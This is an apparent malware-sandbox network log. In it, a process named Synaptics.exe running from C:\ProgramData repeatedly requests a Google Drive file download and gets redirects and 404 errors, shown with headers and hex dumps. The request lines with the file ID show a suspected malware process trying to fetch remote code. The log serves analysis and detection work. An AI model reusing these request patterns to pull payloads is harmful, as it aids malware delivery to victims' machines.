2024-12-30 10:41:36 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 41 2d 61 6d 71 44 6a 38 66 41 56 58 34 51 4f 2d 2d 70 43 57 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="3A-amqDj8fAVX4QO--pCWg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:36 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49836	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:35 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:36 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:36 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-mfvuINLprpMqjjicvOnnHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49838	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:35 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:36 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:35 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-YLGaG9inPpVzv6kNp_8BYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49853	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:36 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49854	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:36 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49855	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:36 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:37 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:37 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-Rg3g5A7omOEYHjmFQKxBiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49862	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:37 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:37 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:37 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-ZvoHNgXbXk5GH-PBxvy_Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49863	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:37 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:38 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:38 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-JXfxTA8rw5cQqvdnXsQPbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49864	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:37 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:38 UTC	1242	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5sPHfFGMBl4PX4gjgUmUyAPG0qdnW6vZTqHTMuFKro5_tVZS40darwz682h_zaxek Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:38 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-aOh_c8fxq7wByEsirWqeRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:38 UTC	148	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
2024-12-30 10:41:38 UTC	1390	IN	Data Raw: 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 2d 79 78 52 4b 61 63 44 5a 64 66 35 4b 37 45 59 45 7a 5a 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a Data Ascii: Found)!!1</title><style nonce="_-yxRKacDZdf5K7EYEzZXA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
2024-12-30 10:41:38 UTC	114	IN	Data Raw: 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49871	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:38 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=DPtEZqkWeUMpq5dZB0z1HJs9xQLgpB2_HySjpkRoBbvZMpi-mMn31SqbVh8XR8maKW8QmHkCVbZNJ98RCXduro38NA--lOV-9KBv9Z23AYZm6AUy-8WPIeNJA2H_NIsXy7URfaQa4rbx6IONw1g110GPpwA3kBTKKqjTO3FxmZOJ9WlI2AmnYHqD
2024-12-30 10:41:38 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:38 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-7wF-jfOfC0aL-_grTy7hTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49870	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:38 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:38 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7d-oAfu8M__vH61_LR2fQDk7wKA8f_hakcEINF5HokGuwBnGl9kVQezpGhqNg_XO5-Vs11gv8 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:38 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-075p3ampJeS_8VS-Qgqo-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:38 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:38 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 59 7a 6c 41 67 4b 31 4d 47 43 74 37 44 69 33 34 68 45 69 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="qYzlAgK1MGCt7Di34hEi6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:38 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49878	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:38 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:39 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6yxRoIe14uZmOtVvRdxH75Qq8cD2mkfmH9ZjvBbu33Vemwmti0xueGSf5h2-3k0gvp Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:39 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-NZ4PTiWwGiWc0nHlGEjKCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
